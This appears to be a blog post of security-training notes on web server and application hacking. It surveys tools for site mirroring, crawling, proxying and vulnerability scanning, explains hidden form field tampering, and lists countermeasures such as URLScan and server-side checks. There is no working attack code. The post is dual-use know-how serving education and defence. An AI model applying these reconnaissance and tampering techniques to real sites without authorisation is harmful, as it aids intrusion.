  • The program integrates into Internet Explorer and opens a new toolbar window which instantly displays the source code for whatever part of the page you select in the browser window.

Instant Source is an application that lets the user view the underlying source code as he browses a web page. The traditional way of doing this has been the View Source command in the browser. However, the process was tedious as the viewer has to parse the entire text file if he is searching for a particular block of code. Instant Source allows the user to view the code for the selected elements instantly without having to open the entire source.

The program integrates into Internet Explorer and opens a new toolbar window, instantly displaying the source code of the page / selection in the browser window. Instant Source can show all Flash movies, script files (*.JS, *.VBS), style sheets (*.CSS) and images on a page. All external files can be demarcated and stored separately in a folder. The tool also includes HTML, JavaScript and VBScript syntax highlighting and support for viewing external CSS and scripts files directly in the browser. This is not available from the view source command option.

With dynamic HTML, the source code changes after the basic HTML page loads - which is the HTML that was loaded from the server without any further processing. Instant Source integrates into Internet Explorer and shows these changes, thereby eliminating the need for an external viewer.

Hacking Tool: Lynx

http://lynx.browser.org

  • Lynx is a text-based browser used for downloading source files and directory links.

Lynx is a text browser client for users running cursor-addressable, character-cell display devices. It can display HTML documents containing links to files on the local system, as well as files on remote systems running http, gopher, ftp, wais, nntp, finger, or cso/ph/qi servers, and services accessible via logins to telnet, tn3270 or rlogin accounts. Current versions of Lynx run on UNIX, VMS, Windows3.x/9x/NT, 386DOS and OS/2 EMX.

Lynx can be used to access information on the Internet, or to build information systems intended primarily for local access. The current developmental Lynx has two PC ports. The ports are for Win32 (95 and NT) and DOS 386+. There Is a SSL enabled version of Lynx for Win32 by the name of lynxw32.lzh

There is a default Download option of Save to disk. This is disabled if Lynx is running in anonymous mode. Any number of download methods such as kermit and zmodem may be defined in addition to this default in the lynx.cfg file.

Hacking Tool: Wget

www.gnu.org/software/wget/wget.html

  • Wget is a command line tool for Windows and Unix that will download the contents of a web site.

  • It works non-interactively, so it will work in the background, after having logged off.

  • Wget works particularly well with slow or unstable connections by continuing to retrieve a document until the document is fully downloaded.

  • Both http and ftp retrievals can be time stamped, so Wget can see if the remote file has changed since the last retrieval and automatically retrieve the new version if it has.

GNU Wget is a freely available network utility to retrieve files from the Internet using HTTP and FTP. It works non-interactively, allowing the user to enabling work in the background, after having logged off. The recursive retrieval of HTML pages, as well as FTP sites is supported. Can be used to make mirrors of archives and home pages, or traverse the web like a WWW robot.

Wget works well on slow or unstable connections, keeping getting the document until it is fully retrieved and re-getting files from where it left off works on servers (both HTTP and FTP) that support it. Matching of wildcards and recursive mirroring of directories are available when retrieving via FTP. Both HTTP and FTP retrievals can be time-stamped, thus Wget can see if the remote file has changed since last retrieval and automatically retrieve the new version if it has.

By default, Wget supports proxy servers, which can lighten the network load, speed up retrieval and provide access behind firewalls. However, if behind a firewall that requires a socks style gateway, the user can get the socks library and compile wget with support for socks.

Hacking Tool: Black Widow

http://softbytelabs.com

  • Black widow is a website scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program.

  • Use it to scan a site and create a complete profile of the site's structure, files, E-mail addresses, external links and even link errors.

Another tool that can be found in an attacker's arsenal is Black Widow. This tool can be used for various purposes because it functions as a web site scanner, a site mapping tool, a site ripper, a site mirroring tool, and an offline browser program. Note its use as a site mirroring tool. An attacker can use it to mirror the target site on his hard drive and parse it for security flaws in the offline mode.

The attacker can also use this for the information gathering and discovery phase by scanning the site and creating a complete profile of the site's structure, files, e-mail addresses, external links and even errors messages. This will help him launch a targeted attack that has more chance of succeeding and leaving a smaller footprint.

The attacker can also look for specific file types and download any selection of files: from 'JPG' to 'CGI' to 'HTML' to MIME types. There is no file size restriction, and the user can download small to large files, that are a part of a site or from a group of sites.

Hacking Tool: WebSleuth

http://sandsprite.com/sleuth/

  • WebSleuth is an excellent tool that combines spidering with the capability of a personal proxy such as Achilles.

Websleuth is a tool that combines web crawling with the capability of a personal proxy. The current version of sleuth supports functionality to: convert hidden & select form elements to textboxes; efficient forms parsing and analysis; edit rendered source of WebPages; edit raw cookies in their raw state etc.

It can also make raw http requests to servers impersonating the referrer, cookie etc..; block javascript popups automatically; highlight & parse full html source code; and analyze cgi links apart from logging all surfing activities and http headers for requests and responses.

Sleuth can generate reports of elements of web page; facilitate enhanced i.e. Proxy management, as well as security settings management. Sleuth has the facility to monitor cookies in real-time. Javascript console aids in interacting directly with the pages scripts and remove all scripts in a webpage.

Hidden Field Manipulation
  • Hidden fields are embedded within HTML forms to maintain values that will be sent back to the server.

  • Hidden fields serve as a mean for the web application to pass information between different applications.

  • Using this method, an application may pass the data without saving it to a common backend system (typically a database.)

  • A major assumption about the hidden fields is that since they are non visible (i.e. hidden) they will not be viewed or changed by the client.

  • Web attacks challenge this assumption by examining the HTML code of the page and changing the request (usually a POST request) going to the server.

  • By changing the value the entire logic between the different application parts, the application is damaged and manipulated to the new value.

Hidden field tampering:

Most of us who have dabbled with some HTML coding have come across the hidden field. For example, consider the code below:

                    

Most web applications rely on HTML forms to receive input from the user. However, users can choose to save the form to a file, edit it and then use the edited form to submit data back to the server. Herein lies the vulnerability, as this is a "stateless" interaction with the web application. HTTP transactions are connectionless, one-time transmissions.

The conventional way of checking for the continuity of connection is to check the state of the user from information stored at the user's end (Another pointer to the fallacy in trusting the client side data). This can be stored in a browser in three ways; cookies, encoded URLs and HTML form "hidden" fields

Countermeasure

The first rule in web application development from a security standpoint is not to rely on the client side data for critical processes. Using encrypted sessions such as SSL or "secure" cookies are advocated instead of using hidden fields. Digital algorithms may be used where values of critical parameters may be hashed with a digital signature to ascertain the authenticity of data. The safest bet would be to rely on server side authentication mechanisms for high security applications.

---Regards,
Amarjit Singh

Top20 Scan Method : Hacking Web Servers

This method will scan the web server for the top 20 vulnerabilities list published by SANS/FBI (www.sans.org)

Hacking Tool: WebInspect
  • WebInspect is an impressive Web server and application-level vulnerability scanner which scans over 1500 known attacks.

  • It checks site contents and analyzes for rudimentary application-issues like smart guesswork checks, password guessing, parameter passing, and hidden parameter checks.

  • It can analyze a basic Webserver in 4 minutes cataloging over 1500 HTML pages

WebInspect enables application and web services developers to automate the discovery of security vulnerabilities as they build applications, access detailed steps for remediation of those vulnerabilities and deliver secure code for final quality assurance testing.

With WebInspect, the developer can find and correct vulnerabilities at their source, before attackers can exploit them. WebInspect provides the technology necessary to identify vulnerabilities at the next level, the Web application.

Network Tool: Shadow Security Scanner

http://www.safety-lab.com

  • Security scanner is designed to identify known and unknown vulnerabilities, suggest fixes to identified vulnerabilities, and report possible security holes within a network's internet, intranet and extranet environments.

  • Shadow Security Scanner includes vulnerability auditing modules for many systems and services.

    These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP,LDAP,TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing extensions, MSSQL,IBM DB2, Oracle, MySQL, PostgressSQL, Interbase, MiniSQL and

These include NetBIOS, HTTP, CGI and WinCGI, FTP, DNS, DoS vulnerabilities, POP3, SMTP, LDAP, TCP/IP, UDP, Registry, Services, Users and accounts, Password vulnerabilities, publishing extensions, MSSQL, IBM DB2, Oracle, MySQL, PostgressSQL, Interbase, MiniSQL and more.

Running on its native Windows platform, SSS also scans servers built practically on any platform, successfully revealing vulnerabilities in Unix, Linux, FreeBSD, OpenBSD, Net BSD, Solaris and, of course, Windows 95/98/ME/NT/2000/XP/.NET. Because of its unique architecture, SSS is the able to detect faults with CISCO, HP, and other network equipment. It is also capable of tracking more than 2,000 audits per system.

The Rules and Settings Editor will be essential for the users willing only to scan the desired ports and services without wasting time and resources on scanning other services. Flexible tuning lets system administrators manage scanning depth and other options to make benefit of speed - optimized network scanning without any loss in scanning quality.

Countermeasures
  • IISLockdown:

    • IISLockdown restricts anonymous access to system utilities as well as the ability to write to Web content directories.

    • It disables Web Distributed Authoring and Versioning (WebDAV).

    • It installs the URLScan ISAPI filter.

  • URLScan:

    • URLScan is a security tool that screens all incoming requests to the server by filtering the requests based on rules that are set by the administrator.

UrlScan is a security tool that screens all incoming requests to the server by filtering the requests based on rules that are set by the administrator. Filtering requests helps secure the server by ensuring that only valid requests are processed. UrlScan helps protect Web servers because most malicious attacks share a common characteristic they involve the use of a request that is unusual in some way. For instance, the request might be extremely long, request an unusual action, be encoded using an alternate character set, or include character sequences that are rarely seen in legitimate requests. By filtering unusual requests, UrlScan helps prevent such requests from reaching the server and potentially causing damage.

Summary
  • Web servers assume critical importance in the realm of Internet security.

  • Vulnerabilities exist in different releases of popular web servers and respective vendors patch these often.

  • The inherent security risks owing to compromised web servers have impact on the local area networks that host these web sites, even the normal users of web browsers.

  • Looking through the long list of vulnerabilities that had been discovered and patched over the past few years provide an attacker ample scope to plan attacks to unpatched servers.

  • Different tools/exploit codes aids an attacker perpetrate web server hacking.

  • Countermeasures include scanning, for existing vulnerabilities and patching them immediately, anonymous access restriction, incoming traffic request screening and filtering.


---Regards,
Amarjit Singh
Newer Posts Older Posts Home